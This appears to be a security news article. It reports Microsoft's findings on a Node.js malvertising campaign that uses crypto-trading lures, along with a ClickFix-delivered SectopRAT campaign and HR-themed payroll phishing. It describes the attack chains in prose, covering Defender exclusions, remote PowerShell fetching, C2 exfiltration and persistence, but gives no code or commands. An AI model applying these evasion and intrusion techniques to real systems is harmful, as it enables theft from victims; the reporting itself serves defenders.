Microsoft is calling attention to an ongoing malvertising campaign that makes use of Node.js to deliver malicious payloads capable of information theft and data exfiltration.
The activity, first detected in October 2024, uses lures related to cryptocurrency trading to trick users into installing a rogue installer from fraudulent websites that masquerade as legitimate software like Binance or TradingView.
The downloaded installer comes embedded with a dynamic-link library (“CustomActions.dll”) that’s responsible for harvesting basic system information using Windows Management Instrumentation (WMI) and setting up persistence on the host via a scheduled task.
In an attempt to keep up the ruse, the DLL launches a browser window via “msedge_proxy.exe” that displays the legitimate cryptocurrency trading website. It’s worth noting that “msedge_proxy.exe” can be used to display any website as a web application.
The scheduled task, in the meanwhile, is configured to run PowerShell commands to download from a remote server additional scripts, which take care of excluding the running PowerShell process as well as the current directory from being scanned by Microsoft Defender for Endpoint as a way to sidestep detection.
Once the exclusions are set, an obfuscated PowerShell command is run to fetch and run scripts from remote URLs that are capable of gathering extensive information related to the operation system, BIOS, hardware, and installed applications.
All the captured data is converted into JSON format and sent to the command-and-control (C2) server using an HTTPS POST request.
The attack chain then proceeds to the next phase where another PowerShell script is launched to download an archive file from the C2 that contains the Node.js runtime binary and a JavaScript compiled (JSC) file. The Node.js executable kick-starts the execution of the JSC file, which goes to establish network connections and likely siphon sensitive browser information.
In an alternate infection sequence observed by Microsoft, the ClickFix strategy has been employed to enable inline JavaScript execution, using a malicious PowerShell command to download the Node.js binary and use it to run JavaScript code directly, instead of from a file.
The inline JavaScript carries out network discovery activities to identify high-value assets, disguises the C2 traffic as legitimate Cloudflare activity to fly under the radar, and gains persistence by modifying Windows Registry run keys.
“Node.js is an open-source, cross-platform JavaScript runtime environment that allows JavaScript code to run outside of a web browser,” the tech giant said. “It’s widely used and trusted by developers because it lets them build frontend and backend applications.”
“However, threat actors are also leveraging these Node.js characteristics to try to blend malware with legitimate applications, bypass conventional security controls, and persist in target environments.”
The disclosure comes as CloudSEK revealed that a fake PDF-to-DOCX converter site impersonating PDF Candy (candyxpdf[.]com or candyconverterpdf[.]com) has been found leveraging the ClickFix social engineering trick to coax victims into running encoded PowerShell commands that ultimately deploy SectopRAT (aka ArechClient2) malware.
“The threat actors meticulously replicated the user interface of the genuine platform and registered similar-looking domain names to deceive users,” security researcher Varun Ajmera said in a report published this week.
“The attack vector involves tricking victims into executing a PowerShell command that installs Arechclient2 malware, a variant of the dangerous SectopRAT information stealer family known for harvesting sensitive data from compromised systems.”
Phishing campaigns have also been observed using a PHP-based kit to target companies’ employees with human resources (HR)-themed scams to gain unauthorized access to payroll portals and change victims’ bank account information to redirect funds to an account under the threat actor’s control.
Some of these activities have been attributed to a hacking group called Payroll Pirates, with the attackers utilizing malicious search advertising campaigns with sponsored phishing websites and spoofed HR pages via Google to lure unsuspecting victims into providing their credentials and two-factor authentication (2FA) codes.
